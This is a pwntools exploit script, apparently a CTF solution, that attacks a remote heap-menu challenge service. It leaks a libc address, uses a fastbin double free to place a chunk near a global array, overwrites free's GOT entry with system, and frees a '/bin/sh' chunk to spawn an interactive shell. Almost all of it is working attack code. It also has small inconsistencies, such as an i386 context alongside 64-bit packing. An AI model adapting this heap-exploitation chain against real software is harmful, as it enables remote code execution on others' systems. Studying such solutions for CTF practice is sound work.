1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55
| from pwn import *
context(arch='i386', log_level='debug', os='linux') elf=ELF("./pwn")
def malloc(size, contet): p.sendlineafter("5. exit", b'1') p.sendlineafter("--->", str(size)) p.sendafter("--->", contet) def free(id): p.sendlineafter("5. exit", b'3') p.sendlineafter("--->", str(id))
def edit(id,size,contet): p.sendlineafter("5. exit", b'2') p.sendlineafter("--->", str(id)) p.sendlineafter("--->", str(size)) p.sendafter("--->", contet)
def show(id): p.sendlineafter("5. exit", b'4') p.sendlineafter("--->", str(id))
# p = process('./pwn') p = remote('node4.buuoj.cn', 26517) libc = ELF('libc-2.23.so') malloc(0x80, b'qwer') malloc(0x80, b'qwer') malloc(0x68, b'qwer') malloc(0x68, b'qwer') malloc(0x68, b'/bin/sh')
free(0) show(0) p.recvuntil(":") libc_base = u64(p.recv(7)[1:] + b'\0' * 2) - 0x7fef613c4b78 + 0x7fef61000000 system = libc_base + libc.sym["system"] free_got = elf.got['free'] # pause() free(2) free(3) free(2) malloc(0x68, p64(0x0000000006020C0 - 0x23)) malloc(0x68, 'ase') malloc(0x68, 'ase') print(hex(libc_base)) print(hex(free_got)) malloc(0x68, b'a' * (0x23 - 0x10) + p64(free_got)) # attach(p) edit(0, 10, p64(system)) p.sendlineafter("5. exit", b'3') p.sendlineafter("--->", b'4') p.interactive()
|